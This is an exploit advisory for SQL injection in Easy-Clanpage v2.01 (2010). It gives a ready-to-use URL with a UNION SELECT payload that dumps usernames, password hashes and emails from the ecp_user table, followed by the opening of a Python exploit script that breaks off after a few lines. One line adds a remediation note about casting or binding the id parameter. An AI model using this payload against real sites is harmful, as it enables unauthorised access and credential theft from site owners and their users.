1 −−−−−−−−−−−−−−−−−−−−−−−−−−−−Information−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
2 +Name : Easy-Clanpage <= v2.01 SQL Injection Exploit
3 +Author : Easy Laster
4 +Date : 25.03.2010
5 +Script : Easy-Clanpage <= v2.01
6 +Download : Update Version 2.0->2.01 : http://www.easy-clanpage.de/?section=downloads&action=viewdl&id=13
8 +Price : for free
9 +Language : PHP
10 +Discovered by Easy Laster
11 +Security Group : 4004-Security-Project
12 +Greetz to Team-Internet, Underground Agents
13 +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
14 Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
15 N00bor,Ic3Drag0n,novaca!ne.
16
17 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
18
19 ___ ___ ___ ___ _ _ _____ _ _
20 | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_
21 |_ | | | | |_ |___|_ −| −_| _| | | _| | _| | |___| __| _| . | | | −_| _| _|
22 |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_|
23 |___| |___|
24
25
26 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
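27 +Vulnerability : the id parameter of the user details page (section=user&action=details) appears to reach the SQL query unvalidated; casting it to an integer or binding it as a query parameter removes the injection point.
http://www.site.com/Easy-Clanpage/?section=user&action=details&id=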
28
29 #SQL Injection
30 +Exploitable : http://www.site.com/Easy−Clanpage/?section=user&action=details&id=1
31 +union+select+concat(username,0x3a,password,0x3a,email)+from+ecp_user+where+userID=1−−
32 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
33
34 #SQL Injection Exploit
35
36 #!/usr/bin/env python
37 #−*− coding:utf−8 −*−
38 import sys, urllib2, re
39
40 if len(sys.argv) < 2:
41 print "***************************************************************"
42 print "************ Easy−Clanpage v2.01 Profil Page Hack *************